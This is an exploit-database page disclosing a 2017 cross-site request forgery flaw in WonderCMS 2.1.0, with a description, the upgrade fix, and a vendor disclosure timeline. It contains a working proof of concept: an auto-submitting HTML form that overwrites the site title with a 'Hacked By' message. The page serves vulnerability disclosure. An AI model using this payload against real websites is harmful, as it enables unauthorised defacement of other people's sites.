header-logo
Suggest Exploit
vendor:
WonderCMS
by:
Zerox Security Lab
8,8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: WonderCMS
Affected Version From: 2.1.0
Affected Version To: 2.1.0
Patch Exists: YES
Related CWE: N/A
CPE: wondercms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Cross-Site Request Forgery in WonderCMS

WonderCMS is a free open source Content Management System. In other words, WonderCMS is a free website builder. WonderCMS doesn't require any configuration and can be simply unzipped and uploaded to your hosting provider. The database is a text file which you can copy, move, backup and restore easily. An attacker can exploit this vulnerability by crafting a malicious HTML form and submitting it to the vulnerable application. This form can be used to modify the content of the website.

Mitigation:

Upgrade to WonderCMS 2.2.0 or later
Source

Exploit-DB raw data:

<!--
# Exploit Title: Cross-Site Request Forgery in WonderCMS
# Date: 2017-06-19
# Exploit Author: Zerox Security Lab
# Software Link: https://www.wondercms.com
# Version: 2.1.0
# Twitter: https://twitter.com/ZeroxSecLab

0xCode Lab ID:
---------------
0xC-201706-002

Introduction:
-------------
WonderCMS is a free open source Content Management System. In other
words, WonderCMS is a free website builder.
WonderCMS doesn't require any configuration and can be simply unzipped
and uploaded to your hosting provider. The database is a text file
which you can copy, move, backup and restore easily.

Proof of Concept (PoC):
------------------------
-->
<html>
<body>
<form action="http://localhost/wonder/" method="post">
	<input name="fieldname" value="title">
	<input name="content" value="Hacked By 0xCode Security Lab">
	<input name="target" value="pages">
	<input type="submit" value="ok">
</form>
</body>
</html>
<script>
	document.forms[0].submit();
</script>
<!--
Disclosure Timeline:
---------------------
2017-06-16: Vulnerability found.
2017-06-17: Reported to vendor.
2017-06-17: Vendor responded and send a new version for test in it.
2017-06-17: Test new version and vulernability patched successfully.
2017-06-18: Vendor responded, update released.
2017-06-19: Public Disclosure.

Fix:
----
This issue fixed in WonderCMS 2.2.0

References:
------------
https://www.wondercms.com/whatsnew
https://www.wondercms.com/forum/viewtopic.php?f=8&t=885
https://github.com/robiso/wondercms/issues/36

Credits & Authors:
------------------
Zerox Security Lab
-->

Navigation

Suggest Exploit

Services By CQR